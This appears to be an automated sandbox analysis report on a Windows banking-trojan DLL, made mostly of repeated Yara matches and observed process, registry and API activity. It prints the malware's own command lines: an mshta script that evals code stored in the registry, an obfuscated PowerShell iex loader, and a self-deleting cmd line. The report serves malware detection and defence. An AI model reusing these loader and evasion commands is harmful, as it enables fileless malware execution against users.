Source: Yara match | File source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
Source: Yara match | File source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      Source: Yara match; File source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara match; File source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exe; Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_01065FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

                      barindex
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: tIJVb0BvkI.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01064BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01061645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0106829C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0106190C GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01066D0A NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01064321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010684C1 NtQueryVirtualMemory,
                      Source: tIJVb0BvkI.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs tIJVb0BvkI.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: tIJVb0BvkI.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tIJVb0BvkI.dllReversingLabs: Detection: 47%
                      Source: tIJVb0BvkI.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\Documents\20220504
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3nzoxvm.isc.ps1
                      Source: classification engine; Classification label: mal100.bank.troj.evad.winDLL@24/15@0/2
                      Source: C:\Windows\System32\mshta.exe; File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010668BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{E89B07B0-274E-5A75-F19C-4B2EB590AF42}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{E8676F4A-27AA-5A21-F19C-4B2EB590AF42}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exe; File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe; File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: tIJVb0BvkI.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: tIJVb0BvkI.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0106828B push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01067EA0 push ecx; ret
                      Source: tIJVb0BvkI.dllStatic PE information: section name: .erloc
                      Source: tIJVb0BvkI.dllStatic PE information: real checksum: 0x79835 should be: 0x7529a
                      Source: 5xaibb03.dll.17.drStatic PE information: real checksum: 0x0 should be: 0xd18c
                      Source: 2tb3qiq3.dll.14.drStatic PE information: real checksum: 0x0 should be: 0x12ed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; File created: C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; File created: C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dll

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: Yara match; File source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara match; File source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
